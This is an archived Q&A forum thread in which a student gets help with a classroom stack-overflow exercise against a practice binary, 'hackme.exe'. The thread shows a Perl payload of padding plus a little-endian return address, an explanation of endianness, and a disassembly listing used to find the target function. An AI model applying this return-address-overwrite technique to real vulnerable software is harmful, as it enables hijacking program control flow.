We help IT Professionals succeed at work.

We've partnered with Certified Experts, Carl Webster and Richard Faulkner, to bring you two Citrix podcasts. Learn about 2020 trends and get answers to your biggest Citrix questions!Listen Now


C++ : Change Stack Address

darence asked
Medium Priority
Last Modified: 2012-05-05
I have doing a school project.. Stack Overrun.

I have a address of: 00401D00

I managed to find the last pointer.
Now i intend to write the pointer to the address.
Any idea?

My lecture notes somehow using perl..
converted "\x28\x13\x40" to an address: 401328

Please advice.
Watch Question

what are you exactly trying to do ?

you have to use assembly language to achieve the result and it is not recommended to do so except in very very rare cases. eg exception handling where the language does not provide support for it. another is code related to powering on and off. another one is inside a debugger. and you have to be ***extremely*** careful of what you are doing because the return address of/to the caller code is stored on the stack. even main() gets called from somewhere else. i hope that is enough of a warning/discouragement to avoid the usage. anyways here is one way to do it. it is in MSVC environment and for x86 based processors.
void foo() {
  // some code
  int my_esp = 0x00401328; // assuming short is 16 bits
  __asm mov esp, tmp_esp;


I am trying to get the find the return address, change the address to some place.
In this case, its 00401D00.

I managed to find the return address, except how to point it to 00401D00.
Think need to find the assembly language to point to 00401D00.

Sorry, I misunderstood the question.
Ok, so you want to change the return address that is stored on the stack to 0x00401D00. First thing that you would need to do is find where the ret addr for current function is stored, i.e. the location on stack which stores IP where we would go after exiting current function if we don't fiddle with it manually. Then you store 0x00401D00 to that location. free up any dynamic memory that you need to. and return.


Dear jhshukla..
How can i "store" 0x00401D00 into it?

Is it just AAAAAAAAA."0x00401D00"?

Darence, what processor architecture are you coding for?
Let's say you determine that return address for current function is 0x01234567. How did you figure it out? what memory location did you read to get the information? let's call (i.e. name) that memory location 'ret_addr_loc'. now what you do is overwrite the 32bit value (0x01234567) at that location with the new value (0x00401D00).

for x86 based processors the assembly code is
mov [ret_addr_loc], 0x00401D00
depending on what compiler you are using the ways to incorporate assembly code into C++ code will differ. look up the documentation for your compiler.


I am using DEV-C++
Output is a .exe file.
From my sample assignment,
To get the address: 401328.
they use: "\x28\x13\x40"

Please advice.

can you post the code snippet?

The machine you are using is little-endian. see http://en.wikipedia.org/wiki/Endianness for details. basically, in the group of four bytes the least significant byte is stored first, then the next significant and so on. e.g. while you write 0x2357 (two bytes) as 00100011 01010111 in binary it is stored as 01010111 00100011 i.e. 0x57 0x23 in memory. So, your string when interpreted as int becomes 0x401328. now recall the fact that C-style strings are null terminated. that adds a zero at the end making a total of 4 bytes, x28 x13 x40 x00. this becomes 0x00401328 when interpreted as an integer.



I am given this EXE file.
Main thing is using a perl file to invoke the illegal BAR function..
Upon executing, the BAR address will be shown.
I am supposed to find the numbers of A ( being 41 ) before it goes to the return function.

I calculated it to be 20 A.. but now i do not know how to make the program GO to the bar address.

The syntax of using it is : hackme 3219914 AAAAAAAAAAblah blah blah..

If you manage to "change" the return address to BAR.
You should get a MSG saying I HAVE BEEN HACKED.



This is a sample of the perl file i am talking about.
$arg = "3219914 AAAAAAAAAAAAAAAAAAAA"."\x50\x1E\x40";
$cmd = "hackme ".$arg;

It seems that IF i use this "\x50\x1E\x40";
I am able to get into a BAR4 FUNCTION..
Which should not be the case as i should be getting into a BAR function..

you should be getting inside bar0 function. Get XVI32 from http://www.chmaas.handshake.de/delphi/freeware/xvi32/xvi32.htm. No installation is required. just unzip ALL files into one directory & run xvi32.exe. Open hackme.exe from it and search for "I have been hacked". You will find that the string preceding it is "Inside bar0 function. \n"


I found it..
So what can i do?
This program is supposed to GET INTO bar0 function.
But IF i knoe the address, how am i going to "translate" that into whatever language is x50\x1E\x40.... :)
I think it is probably too late for your assignment but this link might help you for oncoming projects: http://www.smidgeonsoft.prohosting.com/software.html. Get PEBrowse Professional.

Install and open the prog. Open hackme.exe with this prog.
Search for "bar4". Scroll up to the nearest location where you see "; <==0x0040xxxx(*+0xxxx), ...". This means that code jumps to current location from these listed addresses. the numbers inside () are offsets from current location.
Current location is 0x00401E50. This turns out to be your "magic" string that you use to get into bar4. You will see that it is linked from three different addresses.

Now search for bar0. similarly scroll up to find a location which is linked from three different addresses. There is also one link target right before PUSH call. Instinct tells me that this is probably not the desired address. The desired address is 0x00401C90. Try it. If that does not work, brute force your way going forward one instruction at a time.

Not the solution you were looking for? Getting a personalized solution is easy.

Ask the Experts

hackme.exe Section .text (0x00401000)
0x401C90: 55                     PUSH        EBP                ; <==0x00402343(*+0x6B3), 0x00402523(*+0x893), 0x00402703(*+0xA73)
0x401C91: 89E5                   MOV         EBP,ESP            
0x401C93: 83EC08                 SUB         ESP,0x8            
0x401C96: 83C4F8                 ADD         ESP,0xF8          
0x401C99: 6810404000             PUSH        0x404010           ; .text:0x55 0x89 0xE5 0x83
0x401C9E: 83C4F8                 ADD         ESP,0xF8           ; <==0x00401C6C(*-0x32)
0x401CA1: 68631C4000             PUSH        0x401C63           ; .text:Inside bar0 function. |
0x401CA6: 6828304100             PUSH        0x413028           ; .data:,0A
0x401CAB: E8FC1E0000             CALL        0x403BAC          
0x401CB0: 83C410                 ADD         ESP,0x10          
0x401CB3: 89C0                   MOV         EAX,EAX            
0x401CB5: 50                     PUSH        EAX                
0x401CB6: E8B5F90000             CALL        0x411670          
0x401CBB: 83C410                 ADD         ESP,0x10          
0x401CBE: 83C4F8                 ADD         ESP,0xF8          
0x401CC1: 6810404000             PUSH        0x404010           ; .text:0x55 0x89 0xE5 0x83
0x401CC6: 83C4F8                 ADD         ESP,0xF8          
0x401CC9: 687B1C4000             PUSH        0x401C7B           ; .text:I have been hacked!|
0x401CCE: 6828304100             PUSH        0x413028           ; .data:,0A
0x401CD3: E8D41E0000             CALL        0x403BAC          
0x401CD8: 83C410                 ADD         ESP,0x10          
0x401CDB: 89C0                   MOV         EAX,EAX            
0x401CDD: 50                     PUSH        EAX                
0x401CDE: E88DF90000             CALL        0x411670          
0x401CE3: 83C410                 ADD         ESP,0x10          
0x401CE6: C9                     LEAVE                          
0x401CE7: C3                     RET                            

hackme.exe Section .text (0x00401000)
0x401E50: 55                     PUSH        EBP                ; <==0x004025E3(*+0x793), 0x00402403(*+0x5B3), 0x004027C3(*+0x973)
0x401E51: 89E5                   MOV         EBP,ESP            
0x401E53: 83EC08                 SUB         ESP,0x8            
0x401E56: 83C4F8                 ADD         ESP,0xF8          
0x401E59: 6810404000             PUSH        0x404010           ; .text:0x55 0x89 0xE5 0x83
0x401E5E: 83C4F8                 ADD         ESP,0xF8          
0x401E61: 68381E4000             PUSH        0x401E38           ; .text:Inside bar4 function. |
0x401E66: 6828304100             PUSH        0x413028           ; .data:,0A
0x401E6B: E83C1D0000             CALL        0x403BAC          
0x401E70: 83C410                 ADD         ESP,0x10          
0x401E73: 89C0                   MOV         EAX,EAX            
0x401E75: 50                     PUSH        EAX                
0x401E76: E8F5F70000             CALL        0x411670          
0x401E7B: 83C410                 ADD         ESP,0x10          
0x401E7E: 83C4F8                 ADD         ESP,0xF8          
0x401E81: 6810404000             PUSH        0x404010           ; .text:0x55 0x89 0xE5 0x83
0x401E86: 83C4F8                 ADD         ESP,0xF8          
0x401E89: 687B1C4000             PUSH        0x401C7B           ; .text:I have been hacked!|
0x401E8E: 6828304100             PUSH        0x413028           ; .data:,0A
0x401E93: E8141D0000             CALL        0x403BAC          
0x401E98: 83C410                 ADD         ESP,0x10          
0x401E9B: 89C0                   MOV         EAX,EAX            
0x401E9D: 50                     PUSH        EAX                
0x401E9E: E8CDF70000             CALL        0x411670          
0x401EA3: 83C410                 ADD         ESP,0x10          
0x401EA6: C9                     LEAVE                          
0x401EA7: C3                     RET                            

btw, i just figured that 0x00401D00 is bar1. are you, by any chance, trying to return to bar1 from bar0?
Access more of Experts Exchange with a free account
Thanks for using Experts Exchange.

Create a free account to continue.

Limited access with a free account allows you to:

  • View three pieces of content (articles, solutions, posts, and videos)
  • Ask the experts questions (counted toward content limit)
  • Customize your dashboard and profile

*This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.


Please enter a first name

Please enter a last name

8+ characters (letters, numbers, and a symbol)

By clicking, you agree to the Terms of Use and Privacy Policy.